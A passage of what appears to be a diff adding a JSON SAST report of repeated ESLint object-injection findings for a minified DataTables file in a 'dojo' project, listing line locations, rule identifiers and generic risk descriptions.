"dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 178, + "end_line": 178, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 179, + "end_line": 179, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 194, + "end_line": 194, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 195, + "end_line": 195, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 198, + "end_line": 198, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 199, + "end_line": 199, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 200, + "end_line": 200, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 202, + "end_line": 202, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 205, + "end_line": 205, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 214, + "end_line": 214, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 215, + "end_line": 215, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 233, + "end_line": 233, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 234, + "end_line": 234, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 236, + "end_line": 236, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 237, + "end_line": 237, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 243, + "end_line": 243, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 246, + "end_line": 246, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 252, + "end_line": 252, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 255, + "end_line": 255, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 256, + "end_line": 256, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 257, + "end_line": 257, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 258, + "end_line": 258, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 273, + "end_line": 273, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 274, + "end_line": 274, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 275, + "end_line": 275, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 278, + "end_line": 278, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 279, + "end_line": 279, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 280, + "end_line": 280, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 282, + "end_line": 282, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 283, + "end_line": 283, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 287, + "end_line": 287, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 288, + "end_line": 288, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 289, + "end_line": 289, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 290, + "end_line": 290, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 291, + "end_line": 291, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 292, + "end_line": 292, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 293, + "end_line": 293, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 299, + "end_line": 299, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID 